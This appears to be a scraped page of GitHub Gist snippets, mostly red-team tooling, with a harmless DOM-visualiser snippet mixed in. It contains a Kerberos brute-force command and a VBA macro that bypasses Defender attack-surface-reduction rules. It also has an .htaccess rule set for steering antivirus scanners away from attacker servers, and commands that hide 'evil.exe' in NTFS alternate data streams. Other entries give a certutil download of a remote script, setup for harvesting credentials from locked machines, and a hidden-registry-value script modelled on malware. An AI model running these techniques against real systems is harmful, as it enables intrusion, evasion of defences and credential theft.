With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
Ian Williams FishermansEnemy
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // 3D Dom viewer, copy-paste this into your console to visualise the DOM as a stack of solid blocks. | |
| // You can also minify and save it as a bookmarklet (https://www.freecodecamp.org/news/what-are-bookmarklets/) | |
| (() => { | |
| const SHOW_SIDES = false; // color sides of DOM nodes? | |
| const COLOR_SURFACE = true; // color tops of DOM nodes? | |
| const COLOR_RANDOM = false; // randomise color? | |
| const COLOR_HUE = 190; // hue in HSL (https://hslpicker.com) | |
| const MAX_ROTATION = 180; // set to 360 to rotate all the way round | |
| const THICKNESS = 20; // thickness of layers | |
| const DISTANCE = 10000; // ¯\\_(ツ)_/¯ |
TarlogicSecurity
/ kerberos_attacks_cheatsheet.md
Created
May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks
infosecn1nja
/ ASR Rules Bypass.vba
Last active
April 25, 2024 21:00
ASR rules bypass creating child processes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' ASR rules bypass creating child processes | |
| ' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
| ' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
| ' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
| Sub ASR_blocked() | |
| Dim WSHShell As Object | |
| Set WSHShell = CreateObject("Wscript.Shell") | |
| WSHShell.Run "cmd.exe" | |
| End Sub |
infosecn1nja
/ .htaccess
Created
June 9, 2018 09:51
— forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| RewriteEngine On | |
| # Uncomment the below line for verbose logging, including seeing which rule matched. | |
| #LogLevel alert rewrite:trace5 | |
| # BURN AV BURN | |
| # AWS Exclusions. Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html#header-caching-web-device | |
| RewriteCond expr "-R '54.0.0.0/8'" [OR] | |
| RewriteCond expr "-R '52.0.0.0/8'" [OR] |
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
milo2012
/ gist:1c638b19b61c1338e21bad23705ff8fb
Last active
December 1, 2021 11:58
Snagging creds from locked machines (for Raspberry Pi Zero)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ##An update to Snagging Creds From Locked Machines from https://room362.com/post/2016/snagging-creds-from-locked-machines/. | |
| ##Installation on Rasberry Pi Zero | |
| ##Download Raspbian Jessie Lite from https://www.raspberrypi.org/downloads/raspbian/ | |
| ##Use Pi Filler and write image to MicroSD | |
| ##Follow Step 1) in https://learn.adafruit.com/turning-your-raspberry-pi-zero-into-a-usb-gadget/ethernet-gadget to let the Raspberry Pi Zero device emulates as a USB NIC | |
| $ cd /pentest | |
| $ apt-get install -y python git python-pip python-dev screen sqlite3 | |
| $ pip install pycrypto | |
| $ git clone https://github.com/lgandx/Responder |
KyleHanslovan
/ CreateNullRegValue.py
Created
June 3, 2016 15:33
Script which uses Native APIs to create a "hidden" registry value similar to Powerliks and Kovter malware.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from ctypes import * | |
| from ctypes.wintypes import * | |
| import winreg | |
| NTSTATUS = c_long | |
| PVOID = c_void_p | |
| PWSTR = c_wchar_p | |
| OBJ_CASE_INSENSITIVE = 0x00000040 |
Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000